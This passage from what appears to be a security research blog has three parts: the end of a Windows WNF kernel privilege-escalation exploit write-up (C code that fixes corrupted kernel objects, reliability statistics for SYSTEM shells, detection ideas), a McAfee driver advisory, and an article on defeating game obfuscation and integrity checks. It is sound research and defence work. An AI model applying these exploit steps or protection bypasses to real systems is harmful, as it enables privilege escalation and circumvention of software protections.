15 000000f1`f973f678 00007ff9`80aa26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`830fa800 : ntdll!NtWaitForSingleObject+0x14
16 000000f1`f973f680 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`830fa800 00000000`00000000 : 0x00007ff9`80aa26ee

To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.

Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.

This looks as follows:

nt!_WNF_PROCESS_CONTEXT
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 Process          : Ptr64 _EPROCESS
   +0x010 WnfProcessesListEntry : _LIST_ENTRY
   +0x020 ImplicitScopeInstances : [3] Ptr64 Void
   +0x038 TemporaryNamesListLock : _WNF_LOCK
   +0x040 TemporaryNamesListHead : _LIST_ENTRY
   +0x050 ProcessSubscriptionListLock : _WNF_LOCK
   +0x058 ProcessSubscriptionListHead : _LIST_ENTRY
   +0x068 DeliveryPendingListLock : _WNF_LOCK
   +0x070 DeliveryPendingListHead : _LIST_ENTRY
   +0x080 NotificationEvent : Ptr64 _KEVENT

As you can see there is a member TemporaryNamesListHead which is a linked list of the addresses of the TemporaryNamesListHead within the _WNF_NAME_INSTANCE.

Therefore, we can calculate the address of each of the _WNF_NAME_INSTANCES by iterating through the linked list using our arbitrary read primitives.

We can then determine if the Header or RunRef has been corrupted and restore to a sane value which does not cause a BSOD (i.e. 0).

An example of this is:

/**
* This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT
* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset. 
* This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.
**/
void FindCorruptedRunRefs(LPVOID wnf_process_context_ptr)
{

    // +0x040 TemporaryNamesListHead : _LIST_ENTRY
    LPVOID first = read64((char*)wnf_process_context_ptr + 0x40);
    LPVOID ptr; 

    for (ptr = read64(read64((char*)wnf_process_context_ptr + 0x40)); ; ptr = read64(ptr))
    {
        if (ptr == first) return;

        // +0x088 TemporaryNameListEntry : _LIST_ENTRY
        QWORD* nameinstance = (QWORD*)ptr - 17;

        QWORD header = (QWORD)read64(nameinstance);
        
        if (header != 0x0000000000A80903)
        {
            // Fix the header up.
            write64(nameinstance, 0x0000000000A80903);
            // Fix the RunRef up.
            write64((char*)nameinstance + 0x8, 0);
        }
    }
}

NTOSKRNL Base Address

Whilst this isn’t actually needed by the exploit, I had the need to obtain NTOSKRNL base address to speed up some examinations and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, then the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into the wait state, we can then walk the kernel stack for that thread and obtain the return address of a known function. Using this and a fixed offset we can calculate the NTOSKRNL base address. A similar technique was used within KernelForge.

The following output shows the thread whilst in the wait state:

0: kd> !thread ffffbc037834b080
THREAD ffffbc037834b080  Cid 1ed8.1f54  Teb: 000000537ff92000 Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
    ffffbc037d7f7a60  SynchronizationEvent
Not impersonating
DeviceMap                 ffff988cca61adf0
Owning Process            ffffbc037d8a4340       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      3234           Ticks: 542 (0:00:00:08.468)
Context Switch Count      4              IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.000
Win32 Start Address 0x00007ff6e77b1710
Stack Init ffffd288fe699c90 Current ffffd288fe6996a0
Base ffffd288fe69a000 Limit ffffd288fe694000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd288`fe6996e0 fffff804`818e4540 : fffff804`7d17d180 00000000`ffffffff ffffd288`fe699860 ffffd288`fe699a20 : nt!KiSwapContext+0x76
ffffd288`fe699820 fffff804`818e3a6f : 00000000`00000000 00000000`00000001 ffffd288`fe6999e0 00000000`00000000 : nt!KiSwapThread+0x500
ffffd288`fe6998d0 fffff804`818e3313 : 00000000`00000000 fffff804`00000000 ffffbc03`7c41d500 ffffbc03`7834b1c0 : nt!KiCommitThreadWait+0x14f
ffffd288`fe699970 fffff804`81cd6261 : ffffbc03`7d7f7a60 00000000`00000006 00000000`00000001 00000000`00000000 : nt!KeWaitForSingleObject+0x233
ffffd288`fe699a60 fffff804`81cd630a : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ObWaitForSingleObject+0x91
ffffd288`fe699ac0 fffff804`81a058b5 : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtWaitForSingleObject+0x6a
ffffd288`fe699b00 00007ffc`c0babe44 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd288`fe699b00)
00000053`003ffc68 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtWaitForSingleObject+0x14

Exploit Testing and Statistics

As there are some elements of instability and non-deterministic elements of this exploit, then an exploit testing framework was developed to determine the effectiveness across multiple runs and on multiple different supported platforms and by varying the exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system with potentially other third party drivers etc installed and a more noisy kernel pool, it gives some indication of this approach is feasible and also feeds into possible detection mechanisms.

The key variables which can be modified with this exploit are:

  • Spray size
  • Post-exploitation choices

All these are measured over 100 iterations of the exploit (over 5 runs) for a timeout duration of 15 seconds (i.e. a BSOD did not occur within 15 seconds of an execution of the exploit).

SYSTEM shells – Number of times a SYSTEM shell was launched.

Total LFH Writes – For all 100 runs of the exploit, how many corruptions were triggered.

Avg LFH Writes – Average number of LFH overflows needed to obtain a SYSTEM shell.

Failed after 32 – How many times the exploit failed to overflow an adjacent object of the required target type, by reaching the max number of overflow attempts. 32 was chosen a semi-arbitrary value based on empirical testing and the blocks in the BlockBitmap for the LFH being scanned by groups of 32 blocks.

BSODs on exec – Number of times the exploit BSOD the box on execution.

Unmapped Read – Number of times the relative read reaches unmapped memory (ExpWnfReadStateData) – included in the BSOD on exec count above.

Spray Size Variation

The following statistics show runs when varying the spray size.

Spray size 3000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 85 82 76 75 75 78
Total LFH writes 708 726 707 678 624 688
Avg LFH writes 8 8 9 9 8 8
Failed after 32 1 3 2 1 1 2
BSODs on exec 14 15 22 24 24 20
Unmapped Read 4 5 8 6 10 7

Spray size 6000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 80 78 84 79 81
Total LFH writes 674 643 696 762 706 696
Avg LFH writes 8 8 9 9 8 8
Failed after 32 2 4 3 3 4 3
BSODs on exec 14 16 19 13 17 16
Unmapped Read 2 4 4 5 4 4

Spray size 10000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 85 87 85 86 85
Total LFH writes 805 714 761 688 694 732
Avg LFG writes 9 8 8 8 8 8
Failed after 32 3 5 3 3 3 3
BSODs on exec 13 10 10 12 11 11
Unmapped Read 1 0 1 1 0 1

Spray size 20000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 89 90 94 90 90 91
Total LFH writes 624 763 657 762 650 691
Avg LFG writes 7 8 7 8 7 7
Failed after 32 3 2 1 2 2 2
BSODs on exec 8 8 5 8 8 7
Unmapped Read 0 0 0 0 1 0

From this was can see that increasing the spray size leads to a much decreased chance of hitting an unmapped read (due to the page not being mapped) and thus reducing the number of BSODs.

On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.

Post Exploitation Method Variation

I also experimented with the post exploitation method used (token stealing vs modifying the existing token). The reason for this is that performing the token stealing method there are more kernel reads/writes and a longer time duration between reverting PreviousMode.

20000 spray size

With all the _SEP_TOKEN_PRIVILEGES enabled:

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
PRIV shells 94 92 93 92 89 92
Total LFH writes 939 825 825 788 724 820
Avg LFG writes 9 8 8 8 8 8
Failed after 32 2 2 1 2 0 1
BSODs on exec 4 6 6 6 11 6
Unmapped Read 0 1 1 2 2 1

Therefore, there is only negligible difference these two methods.

Detection

After all of this is there anything we have learned which could help defenders?

Well firstly there is a patch out for this vulnerability since the 8th of June 2021. If your reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on 🙂

However, there are some engineering insights which can be gained from this and in general detecting memory corruption exploits within the wild. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic post exploitation technique detection (token stealing etc) which have been covered in many online articles. As I never had access to the in the wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should allow security researchers a greater understanding in this area.

The main artifacts from this exploit are:

  • NTFS Extended Attributes being created and queried.
  • WNF objects being created (as part of the spray)
  • Failed exploit attempts leading to BSODs

NTFS Extended Attributes

Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.

This can be captured as part of an ETW trace:

As this vulnerability can be exploited a low integrity (and thus from a sandbox), then the detection mechanisms would vary based on if an attacker had local code execution or chained it together with a browser exploit.

One idea for endpoint detection and response (EDR) based detection would be that a browser render process executing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome while loading a new tab and web page did not trigger either of the events too. I didn’t explore too deeply if there were any render operations which could trigger this non-maliciously but provides a place where defenders can explore further.

WNF Operations

The second area investigated was to determine if there were any ETW events produced by WNF based operations. Looking through the "Microsoft-Windows-Kernel-*" providers I could not find any related events which would help in this area. Therefore, detecting the spray through any ETW logging of WNF operations did not seem feasible. This was expected due to the WNF subsystem not being intended for use by non-MS code.

Crash Dump Telemetry

Crash Dumps are a very good way to detect unreliable exploitation techniques or if an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well known example of Microsoft using this to identify an 0day from their WER telemetry. This was found by looking for shellcode, however, certain crashes are pretty suspicious when coming from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes too.

In the case of this specific vulnerability when being exploited with WNF, there is a slim chance (approx. <5%) that the following BSOD can occur which could act a detection artefact:

```
Child-SP          RetAddr           Call Site
ffff880f`6b3b7d18 fffff802`1e112082 nt!DbgBreakPointWithStatus
ffff880f`6b3b7d20 fffff802`1e111666 nt!KiBugCheckDebugBreak+0x12
ffff880f`6b3b7d80 fffff802`1dff3fa7 nt!KeBugCheck2+0x946
ffff880f`6b3b8490 fffff802`1e0869d9 nt!KeBugCheckEx+0x107
ffff880f`6b3b84d0 fffff802`1deeeb80 nt!MiSystemFault+0x13fda9
ffff880f`6b3b85d0 fffff802`1e00205e nt!MmAccessFault+0x400
ffff880f`6b3b8770 fffff802`1e006ec0 nt!KiPageFault+0x35e
ffff880f`6b3b8908 fffff802`1e218528 nt!memcpy+0x100
ffff880f`6b3b8910 fffff802`1e217a97 nt!ExpWnfReadStateData+0xa4
ffff880f`6b3b8980 fffff802`1e0058b5 nt!NtQueryWnfStateData+0x2d7
ffff880f`6b3b8a90 00007ffe`e828ea14 nt!KiSystemServiceCopyEnd+0x25
00000082`054ff968 00007ff6`e0322948 0x00007ffe`e828ea14
00000082`054ff970 0000019a`d26b2190 0x00007ff6`e0322948
00000082`054ff978 00000082`054fe94e 0x0000019a`d26b2190
00000082`054ff980 00000000`00000095 0x00000082`054fe94e
00000082`054ff988 00000000`000000a0 0x95
00000082`054ff990 0000019a`d26b71e0 0xa0
00000082`054ff998 00000082`054ff9b4 0x0000019a`d26b71e0
00000082`054ff9a0 00000000`00000000 0x00000082`054ff9b4
```

Under normal operation you would not expect a memcpy operation to fault accessing unmapped memory when triggered by the WNF subsystem. Whilst this telemetry might lead to attack attempts being discovered prior to an attacker obtaining code execution. Once kernel code execution has been gained or SYSTEM, they may just disable the telemetry or sanitise it afterwards – especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios when this is modified:

Windows 11 ETW events.

Conclusion

This article demonstrates some of the further lengths an exploit developer needs to go to achieve more reliable and stable code execution beyond a simple POC.

At this point we now have an exploit which is much more succesful and less likely to cause instability on the target system than a simple POC. However, we can only get about 90%~ success rate due to the techniques used. This seems to be about the limit with this approach and without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability and detection of memory corruption exploits in general.

Acknowledgements

Boris Larin, for discovering this 0day being exploited within the wild and the initial write-up.

Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.

Alex Ionescu and Gabrielle Viala for the initial documentation of WNF.

Corentin Bayet, Paul Fariello, Yarden Shafir, Angelboy, Mark Yason for publishing their research into the Windows 10 Segment Pool/Heap.

Aaron Adams and Cedric Halbronn for doing multiple QA’s and discussions around this research.

✇NCC Group Research

Technical Advisory – NULL Pointer Derefence in McAfee Drive Encryption (CVE-2021-23893)

By: balazs.bucsay
Vendor: McAfee
Vendor URL: https://kc.mcafee.com/corporate/index?page=content&id=sb10361
Versions affected: Prior to 7.3.0 HF1
Systems Affected: Windows OSs without NULL page protection 
Author: Balazs Bucsay <balazs.bucsay[ at ]nccgroup[.dot.]com> @xoreipeip
CVE Identifier: CVE-2021-23893
Risk: 8.8 - CWE-269: Improper Privilege Management

Summary

McAfee’s Complete Data Protection package contained the Drive Encryption (DE) software. This software was used to transparently encrypt the drive contents. The versions prior to 7.3.0 HF1 had a vulnerability in the kernel driver MfeEpePC.sys that could be exploited on certain Windows systems for privilege escalation or DoS.

Impact

Privilege Escalation vulnerability in a Windows system driver of McAfee Drive Encryption (DE) prior to 7.3.0 could allow a local non-admin user to gain elevated system privileges via exploiting an unutilized memory buffer.

Details

The Drive Encryption software’s kernel driver was loaded to the kernel at boot time and certain IOCTLs were available for low-privileged users.

One of the available IOCTL was referencing an event that was set to NULL before initialization. In case the IOCTL was called at the right time, the procedure used NULL as an event and referenced the non-existing structure on the NULL page.

If the user mapped the NULL page and created a fake structure there that mimicked a real Even structure, it was possible to manipulate certain regions of the memory and eventually execute code in the kernel.

Recommendation

Install or update Disk Encryption 7.3.0 HF1, which has this vulnerability fixed.

Vendor Communication

February 24, 2021: Vulnerability was reported to McAfee

March 9, 2021: McAfee was able to reproduce the crash with the originally provided DoS exploit

October 1, 2021: McAfee released the new version of DE, which fixes the issue

Acknowledgements

Thanks to the Cedric Halbronn for his support during the development of the exploit.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. 

Published date:  October 4, 2021

Written by:  Balazs Bucsay

✇NCC Group Research

A Look At Some Real-World Obfuscation Techniques

By: Nicolas Guigo

Among the variety of penetration testing engagements NCC Group delivers, some – often within the gaming industry – require performing the assignment in a blackbox fashion against an obfuscated binary, and the client’s priorities revolve more around evaluating the strength of their obfuscation against content protection violations, rather than exercising the application’s security boundaries.

The following post aims at providing insight into the tools and methods used to conduct those engagements using real-world examples. While this approach allows for describing techniques employed by actual protections, only a subset of the material can be explicitly listed here (see disclaimer for more information).

Unpacking Phase

When first attempting to analyze a hostile binary, the first step is generally to unpack the actual contents of its sections from runtime memory. The standard way to proceed consists of letting the executable run until the unpacking stub has finished deobfuscating, decompressing and/or deciphering the executable’s sections. The unpacked binary can then be reconstructed, by dumping the recovered sections into a new executable and (usually) rebuilding the imports section from the recovered IAT(Import Address Table).

This can be accomplished in many ways including:

  • Debugging manually and using plugins such as Scylla to reconstruct the imports section
  • Python scripting leveraging Windows debugging libraries like winappdbg and executable file format libraries like pefile
  • Intel Pintools dynamically instrumenting the binary at run-time (JIT instrumentation mode recommended to avoid integrity checks)

Expectedly, these approaches can be thwarted by anti-debug mechanisms and various detection mechanisms which, in turn, can be evaded via more debugger plugins such as ScyllaHide or by implementing various hooks such as those highlighted by ICPin. Finally, the original entry point of the application can usually be identified by its immediate calls to canonical C++ language’s internal initialization functions such as _initterm() and _initterm_e.

While the dynamic method is usually sufficient, the below samples highlight automated implementations that were successfully used via a python script to handle a simple packer that did not require imports rebuilding, and a versatile (albeit slower) dynamic execution engine implementation allowing a more granular approach, fit to uncover specific behaviors.

Control Flow Flattening

Once unpacked, the binary under investigation exposes a number of functions obfuscated using control flow graph (CFG) flattening, a variety of antidebug mechanisms, and integrity checks. Those can be identified as a preliminary step by running instrumented under ICPin (sample output below).

Overview

When disassembled, the CFG of each obfuscated function exhibits the pattern below: a state variable has been added to the original flow, which gets initialized in the function prologue and the branching structure has been replaced by a loop of pointer table-based dispatchers (highlighted in white).

Each dispatch loop level contains between 2 and 16 indirect jumps to basic blocks (BBLs) actually implementing the function’s logic.

There are a number of ways to approach this problem, but the CFG flattening implemented here can be handled using a fully symbolic approach that does not require a dynamic engine, nor a real memory context. The first step is, for each function, to identify the loop using a loop-matching algorithm, then run a symbolic engine through it, iterating over all the possible index values and building an index-to-offset map, with the original function’s logic implemented within the BBL-chains located between the blocks belonging to the loop:

Real Destination(s) Recovery

The following steps consist of leveraging the index-to-offset map to reconnect these BBL-chains with each other, and recreate the original control-flow graph. As can be seen in the captures below, the value of the state variable is set using instruction-level obfuscation. Some BBL-chains only bear a static possible destination which can be swiftly evaluated.

For dynamic-destination BBL-chains, once the register used as a state variable has been identified, the next step is to identify the determinant symbols, i.e, the registers and memory locations (globals or local variables) that affect the value of the state register when re-entering the dispatch loop.

This can be accomplished by computing the intermediate language representation (IR) of the assembly flow graph (or BBLs) and building a dependency graph from it. Here we are taking advantage of a limitation of the obfuscator: the determinants for multi-destination BBLs are always contained within the BBL subgraph formed between two dispatchers.

With those determinants identified, the task that remains is to identify what condition these determinants are fulfilling, as well as what destinations in code we jump to once the condition has been evaluated. The Z3 SMT solver from Microsoft is traditionally used around dynamic symbolic engines (DSE) as a means to finding input values leading to new paths. Here, the deobfusactor uses its capabilities to identify the type of comparison the instructions are replacing.

For example, for the equal pattern, the code asks Z3 if 2 valid destination indexes (D1 and D2) exist such that:

  • If the determinants are equal, the value of the state register is equal to D1
  • If the determinants are different, the value of the state register is equal to D2

Finally, the corresponding instruction can be assembled and patched into the assembly, replacing the identified patterns with equivalent assembly sequences such as the ones below, where

  • mod0 and mod1 are the identified determinants
  • #SREG is the state register, now free to be repurposed to store the value of one of the determinants (which may be stored in memory):
  • #OFFSET0 is the offset corresponding to the destination index if the tested condition is true
  • #OFFSET1 is the offset corresponding to the destination index if the tested condition is false
class EqualPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JZ    #OFFSET0
NOP
JMP   #OFFSET1
'''

class UnsignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JA    #OFFSET0
NOP
JMP   #OFFSET1
'''

class SignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JG    #OFFSET0
NOP
JMP   #OFFSET1
'''

The resulting CFG, since every original block has been reattached directly to its real target(s), effectively separates the dispatch loop from the significant BBLs. Below is the result of this first pass against a sample function:

This approach does not aim at handling all possible theoretical cases; it takes advantage of the fact that the obfuscator only transforms a small set of arithmetic operations.

Integrity Check Removal

Once the flow graph has been unflattened, the next step is to remove the integrity checks. These can mostly be identified using a simple graph matching algorithm (using Miasm’s “MatchGraphJoker” expressions) which also constitutes a weakness in the obfuscator. In order to account for some corner cases, the detection logic implemented here involves symbolically executing the identified loop candidates, and recording their reads against the .text section in order to provide a robust identification.

On the above graph, the hash verification flow is highlighted in yellow and the failure case (in this case, sending the execution to an address with invalid instructions) in red. Once the loop has been positively identified, the script simply links the green basic blocks to remove the hash check entirely.

“Dead” Instructions Removal

The resulting assembly is unflattened, and does not include the integrity checks anymore, but still includes a number of “dead” instructions which do not have any effect on the function’s logic and can be removed. For example, in the sample below, the value of EAX is not accessed between its first assignment and its subsequent ones. Consequently, the first assignment of EAX, regardless of the path taken, can be safely removed without altering the function’s logic.

start:
    MOV   EAX, 0x1234
    TEST  EBX, EBX
    JNZ   path1
path0:
    XOR   EAX, EAX
path1:
    MOV   EAX, 0x1

Using a dependency graph (depgraph) again, but this time, keeping a map of ASM <-> IR (one-to-many), the following pass removes the assembly instructions for which the depgraph has determined all corresponding IRs are non-performative.

Finally, the framework-provided simplifications, such as bbl-merger can be applied automatically to each block bearing a single successor, provided the successor only has a single predecessor. The error paths can also be identified and “cauterized”, which should be a no-op since they should never be executed but smoothen the rebuilding of the executable.

A Note On Antidebug Mechanisms

While a number of canonical anti-debug techniques were identified in the samples; only a few will be covered here as the techniques are well-known and can be largely ignored.

PEB->isBeingDebugged

In the example below, the function checks the PEB for isBeingDebugged (offset 0x2) and send the execution into a stack-mangling loop before continuing execution which is leads to a certain crash, obfuscating context from a naive debugging attempt.

Debug Interrupts

Another mechanism involves debug software interrupts and vectored exception handlers, but is rendered easily comprehensible once the function has been processed. The code first sets two local variables to pseudorandom constant values, then registers a vectored exception handler via a call to AddVectoredExceptionHandler. An INT 0x3 (debug interrupt) instruction is then executed (via the indirect call to ISSUE_INT3_FN), but encoded using the long form of the instruction: 0xCD 0x03.

After executing the INT 0x3 instruction, the code flow is resumed in the exception handler as can be seen below.

If the exception code from the EXCEPTION_RECORD structure is a debug breakpoint, a bitwise NOT is applied to one of the constants stored on stack. Additionally, the Windows interrupt handler handles every debug exception assuming they stemmed from executing the short version of the instruction (0xCC), so were a debugger to intercept the exception, those two elements need to be taken into consideration in order for execution to continue normally.

Upon continuing execution, a small arithmetic operation checks that the addition of one of the initially set constants (0x8A7B7A99) and a third one (0x60D7B571) is equal to the bitwise NOT of the second initial constant (0x14ACCFF5), which is the operation performed by the exception handler.

0x8A7B7A99 + 0x60D7B571 == 0xEB53300AA == ~0x14ACCFF5

A variant using the same exception handler operates in a very similar manner, substituting the debug exception with an access violation triggered via allocating a guard page and accessing it (this behavior is also flagged by ICPin).

Rebuilding The Executable

Once all the passes have been applied to all the obfuscated functions, the patches can be recorded, then applied to a free area of the new executable, and a JUMP is inserted at the function’s original offset.

Example of a function before and after deobfuscation:

Obfuscator’s Integrity Checking Internals

It is generally unnecessary to dig into the details of an obfuscator’s integrity checking mechanism; most times, as described in the previous example, identifying its location or expected result is sufficient to disable it. However, this provides a good opportunity to demonstrate the use of a DSE to address an obfuscator’s internals – theoretically its most hardened part.

ICPin output immediately highlights a number of code locations performing incremental reads on addresses in the executable’s .text section. Some manual investigation of these code locations points us to the spot where a function call or branching instruction switches to the obfuscated execution flow. However, there are no clearly defined function frames and the entire set of executed instructions is too large to display in IDA.

In order to get a sense of the execution flow, a simple jitter callback can be used to gather all the executed blocks as the engine runs through the code. Looking at the discovered blocks, it becomes apparent that the code uses conditional instructions to alter the return address on the stack, and hides its real destination with opaque predicates and obfuscated logic.

Starting with that information, it would be possible to take a similar approach as in the previous example and thoroughly rebuild the IR CFG, apply simplifications, and recompile the new assembly using LLVM. However, in this instance, armed with the knowledge that this obfuscated code implements an integrity check, it is advantageous to leverage the capabilities of a DSE.

A CFG of the obfuscated flow can still be roughly computed, by recording every block executed and adding edges based on the tracked destinations. The stock simplifications and SSA form can be used to obtain a graph of the general shape below:

Deciphering The Data Blobs

On a first run attempt, one can observe 8-byte reads from blobs located in two separate memory locations in the .text section, which are then processed through a loop (also conveniently identified by the tracking engine). With the memX symbols representing constants in memory, and blob0 representing the sequentially read input from a 32bit ciphertext blob, the symbolic values extracted from the blobs look as follows, looping 32 times:

res = (blob0 + ((mem1 ^ mem2)*mul) + sh32l((mem1 ^ mem2), 0x5)) ^ (mem3 + sh32l(blob0, 0x4)) ^ (mem4 + sh32r(blob0,  0x5))

Inspection of the values stored at memory locations mem1 and mem2 reveals the following constants:

@32[0x1400DF45A]: 0xA46D3BBF
@32[0x14014E859]: 0x3A5A4206

0xA46D3BBF^0x3A5A4206 = 0x9E3779B9

0x9E3779B9 is a well-known nothing up my sleeve number, based on the golden ratio, and notably used by RC5. In this instance however, the expression points at another Feistel cipher, TEA, or Tiny Encryption Algorithm:

void decrypt (uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up; sum is 32*delta */
    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i<32; i++) {                         /* basic cycle start */
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    }
    v[0]=v0; v[1]=v1;
}

Consequently, the 128-bit key can be trivially recovered from the remaining memory locations identified by the symbolic engine.

Extracting The Offset Ranges

With the decryption cipher identified, the next step is to reverse the logic of computing ranges of memory to be hashed. Here again, the memory tracking execution engine proves useful and provides two data points of interest:
– The binary is not hashed in a continuous way; rather, 8-byte offsets are regularly skipped
– A memory region is iteratively accessed before each hashing

Using a DSE such as this one, symbolizing the first two bytes of the memory region and letting it run all the way to the address of the instruction that reads memory, we obtain the output below (edited for clarity):

-- MEM ACCESS: {BLOB0 & 0x7F 0 8, 0x0 8 64} + 0x140000000
# {BLOB0 0 8, 0x0 8 32} & 0x80 = 0x0
...

-- MEM ACCESS: {(({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32} 0 32, 0x0 32 64} + 0x140000000
# 0x0 = ({BLOB0 0 8, 0x0 8 32} & 0x80)?(0x0,0x1)
# ((({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32}) == 0xFFFFFFFF = 0x0
...

The accessed memory’s symbolic addresses alone provide a clear hint at the encoding: only 7 of the bits of each symbolized byte are used to compute the address. Looking further into the accesses, the second byte is only used if the first byte’s most significant bit is not set, which tracks with a simple unsigned integer base-128 compression. Essentially, the algorithm reads one byte at a time, using 7 bits for data, and using the last bit to indicate whether one or more byte should be read to compute the final value.

Identifying The Hashing Algorithm

In order to establish whether the integrity checking implements a known hashing algorithm, despite the static disassembly showing no sign of known constants, a memory tracking symbolic execution engine can be used to investigate one level deeper. Early in the execution (running the obfuscated code in its entirety may take a long time), one can observe the following pattern, revealing well-known SHA1 constants.

0x140E34F50 READ @32[0x140D73B5D]: 0x96F977D0
0x140E34F52 READ @32[0x140B1C599]: 0xF1BC54D1
0x140E34F54 READ @32[0x13FC70]: 0x0
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD0]: 0x67452301

0x140E34F50 READ @32[0x140D73B61]: 0x752ED515
0x140E34F52 READ @32[0x140B1C59D]: 0x9AE37E9C
0x140E34F54 READ @32[0x13FC70]: 0x1
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD4]: 0xEFCDAB89

0x140E34F50 READ @32[0x140D73B65]: 0xF9396DD4
0x140E34F52 READ @32[0x140B1C5A1]: 0x6183B12A
0x140E34F54 READ @32[0x13FC70]: 0x2
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD8]: 0x98BADCFE

0x140E34F50 READ @32[0x140D73B69]: 0x2A1B81B5
0x140E34F52 READ @32[0x140B1C5A5]: 0x3A29D5C3
0x140E34F54 READ @32[0x13FC70]: 0x3
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCDC]: 0x10325476

0x140E34F50 READ @32[0x140D73B6D]: 0xFB95EF83
0x140E34F52 READ @32[0x140B1C5A9]: 0x38470E73
0x140E34F54 READ @32[0x13FC70]: 0x4
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCE0]: 0xC3D2E1F0

Examining the relevant code addresses (as seen in the SSA notation below), it becomes evident that, in order to compute the necessary hash constants, a simple XOR instruction is used with two otherwise meaningless constants, rendering algorithm identification less obvious from static analysis alone.

And the expected SHA1 constants are stored on the stack:

0x96F977D0^0xF1BC54D1 ==> 0x67452301
0x752ED515^0x9AE37E9C ==> 0XEFCDAB89
0xF9396DD4^0x6183B12A ==> 0X98BADCFE
0x2A1B81B5^0x3A29D5C3 ==> 0X10325476
0xFB95EF83^0x38470E73 ==> 0XC3D2E1F0

Additionally, the SHA1 algorithm steps can be further observed in the SSA graph, such as the ROTL-5 and ROTL-30 operations, plainly visible in the IL below.

Final Results

The entire integrity checking logic recovered from the obfuscator implemented in Python below was verified to produce the same digest, as when running under the debugger, or a straightforward LLVM jitter. The parse_ranges() function handles the encoding, while the accumulate_bytes() generator handles the deciphering and processing of both range blobs and skipped offset blobs.

Once the hashing of the memory ranges dictated by the offset table has completed, the 64bit values located at the offsets deciphered from the second blob are subsequently hashed. Finally, once the computed hash value has been successfully compared to the valid digest stored within the RWX .text section of the executable, the execution flow is deemed secure and the obfuscator proceeds to decipher protected functions within the .text section.

def parse_ranges(table):
  ranges = []
  rangevals = []
  tmp = []
  for byte in table:
    tmp.append(byte)
    if not byte&0x80:
      val = 0
      for i,b in enumerate(tmp):
        val |= (b&0x7F)<<(7*i)
      rangevals.append(val)
      tmp = [] # reset
  offset = 0
  for p in [(rangevals[i], rangevals[i+1]) for i in range(0, len(rangevals), 2)]:
    offset += p[0]
    if offset == 0xFFFFFFFF:
      break
    ranges.append((p[0], p[1]))
    offset += p[1]
  return ranges

